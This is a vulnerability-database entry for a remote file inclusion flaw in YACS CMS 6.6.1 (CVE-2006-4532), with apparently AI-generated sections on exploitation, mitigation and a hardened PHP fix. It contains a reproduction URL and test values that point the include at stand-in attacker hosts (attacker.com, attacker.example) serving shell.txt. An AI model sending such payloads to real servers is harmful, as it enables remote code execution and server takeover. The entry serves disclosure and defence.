CVE-2006-4532
Description
YACS CMS 6.6.1 and earlier allows remote file inclusion via context[path_to_root] parameter in articles/article.php, enabling arbitrary code execution.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
PHP remote file inclusion vulnerability exists in articles/article.php of YACS CMS version 6.6.1 and earlier. The script includes a file based on the user-supplied context[path_to_root] parameter without proper sanitization, allowing inclusion of remote files [1].
Exploitation
An attacker can exploit this by sending a crafted HTTP request to the vulnerable script with context[path_to_root] set to a URL hosting malicious PHP code, as demonstrated in public exploits [2]. No authentication or special network position is required beyond network access to the target.
Impact
Successful exploitation allows arbitrary PHP code execution with the privileges of the web server, potentially leading to full system compromise, including data theft, defacement, or further attacks.
Mitigation
No patch is recorded in this entry and the software may be end-of-life, although NVD tags the vendor article and the Secunia advisory listed under References as patch references, so check those before assuming none exists. Users should upgrade if a fixed release is available; otherwise remove or disable the vulnerable script, set allow_url_include = Off (allow_url_fopen = Off on PHP releases before 5.2, where that setting also governed include), keep register_globals off so that a query parameter named context[path_to_root] cannot populate the script's $context array, and validate the path before it reaches any include. The vulnerability is publicly known and a working exploit is listed in the Exploit Database [2].
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- cpe:2.3:a:bernard_pacques:yet_another_community_system_cms:6.6.1:*:*:*:*:*:*:*
- Range: <=6.6.1
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"PHP remote file inclusion vulnerability due to unsanitized user input passed to a PHP include/require statement."
Attack vector
An attacker sends an HTTP GET request to articles/article.php with the context[path_to_root] parameter set to a URL pointing to an attacker-controlled remote server hosting malicious PHP code [ref_id=1]. The vulnerable script passes this user-supplied value directly into a PHP include/require construct, causing the server to fetch and execute the remote PHP code. No authentication or special privileges are required; the attack is performed over HTTP and the payload is simply a URL string.
Affected code
The vulnerable file is articles/article.php in YACS CMS 6.6.1 and earlier [ref_id=1]. The specific vulnerable code path is the inclusion of a file whose path is derived from the context[path_to_root] HTTP parameter without sanitization.
What the fix does
No patch is included in the bundle, and the advisory [ref_id=1] does not provide remediation code. A correct fix would stop deriving the root path from request data at all and compute it from the script's own location; where a configurable root is unavoidable, the value must be checked against an allow-list of local directories and rejected if it carries a URL scheme or traversal sequences. Disabling URL includes in php.ini (allow_url_include = Off on PHP 5.2 and later; allow_url_fopen = Off on earlier releases, where that setting also governed include) blocks the remote variant but does not stop local file inclusion through the same parameter, so it is defence in depth rather than the fix.
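The following is an added illustration of the vulnerable pattern the advisory describes and one way to harden it; it is not YACS code, and the names used ($context, the shared/global.php suffix, APP_ROOT, safe_path_to_root) are assumptions chosen for the example. The vulnerable function reproduces the class of bug (request-controlled prefix concatenated into an include), the hardened function refuses anything that is not an allow-listed local directory.

```php
<?php
// Added example, not code from YACS. $context, the 'shared/global.php'
// suffix, APP_ROOT and safe_path_to_root() are assumed names.

// --- Vulnerable pattern (do not deploy) ----------------------------------
// With register_globals=On, a request such as
//   articles/article.php?context[path_to_root]=http://attacker/shell.txt?
// sets $context['path_to_root'] before this runs. PHP then fetches
// http://attacker/shell.txt?shared/global.php (the appended suffix becomes
// a harmless query string) and executes the response as PHP.
function vulnerable_include(array $context): void
{
    include $context['path_to_root'] . 'shared/global.php';
}

// --- Hardened form ---------------------------------------------------------
// 1. Derive the root from the script's own location, never from a request.
// 2. If a configurable root must be accepted, allow-list real directories and
//    reject any stream wrapper (http://, ftp://, php://, data:) or traversal.
define('APP_ROOT', rtrim(realpath(__DIR__ . '/..'), '/') . '/'); // assumed layout

function safe_path_to_root(?string $candidate): string
{
    $allowed = [APP_ROOT];                      // assumed allow-list of local roots
    if ($candidate === null || $candidate === '') {
        return APP_ROOT;
    }
    // "scheme:" prefix covers every PHP stream wrapper; '..' blocks traversal.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $candidate) || strpos($candidate, '..') !== false) {
        throw new InvalidArgumentException('path_to_root must be a plain local directory');
    }
    $real = realpath($candidate);               // canonicalise symlinks and './'
    if ($real === false || !is_dir($real)) {
        throw new InvalidArgumentException('path_to_root does not exist');
    }
    $real = rtrim($real, '/') . '/';
    if (!in_array($real, $allowed, true)) {
        throw new InvalidArgumentException('path_to_root is not an allowed root');
    }
    return $real;
}

function hardened_include(array $context): void
{
    $root = safe_path_to_root($context['path_to_root'] ?? null);
    require $root . 'shared/global.php';
}

// Self-check of the validator against the exploit shapes seen in the wild.
$rejected = [];
foreach ([
    'http://attacker.example/shell.txt?',   // the public exploit's payload shape
    'ftp://attacker.example/shell.txt?',
    'php://input',
    'data:text/plain,<?php phpinfo();',
    '../../../../etc/',
] as $bad) {
    try {
        safe_path_to_root($bad);
    } catch (InvalidArgumentException $e) {
        $rejected[] = $bad;
    }
}
printf("rejected %d/5 malicious values; trusted root is %s\n", count($rejected), safe_path_to_root(null));
```

The allow-list check is what actually closes the hole: the scheme and traversal tests are early rejects for readability, but even a value that slips past them is only accepted if realpath() resolves it to a directory the application already trusts. Pair this with allow_url_include = Off and register_globals = Off so that neither the remote nor the local variant has a way in.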
Preconditions
- network: The attacker must be able to send HTTP requests to the target server.
- input: For the remote variant PHP must permit URL includes (allow_url_include on PHP 5.2 and later, allow_url_fopen on earlier releases); otherwise the attacker needs a file they control already present on a local path reachable by the web server. The query parameter can only overwrite $context['path_to_root'] if register_globals is enabled or the script itself copies request data into $context.
Reproduction
Send a request to the target server: http://[target]/[path]/yacs/articles/article.php?context[path_to_root]=http://attacker.com/shell.txt? [ref_id=1]. The trailing question mark matters because the script appends its own fixed file name after path_to_root; with the "?" in place that suffix becomes a query string on the attacker's server, so the URL still resolves to shell.txt rather than to a non-existent path. The remote file is fetched and executed by the PHP interpreter with the web server's privileges, so a harmless marker such as a file that only prints a fixed string is enough to confirm the issue.
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- www.yetanothercommunitysystem.com/yacs/articles/view.php/1664 (NVD tags: Patch, URL Repurposed)
- secunia.com/advisories/21680 (NVD tags: Exploit, Patch, Vendor Advisory)
- securitytracker.com/id (NVD tags: Exploit, Patch)
- www.vupen.com/english/advisories/2006/3425
- exchange.xforce.ibmcloud.com/vulnerabilities/28682
- www.exploit-db.com/exploits/2282
News mentions
No linked articles in our index yet.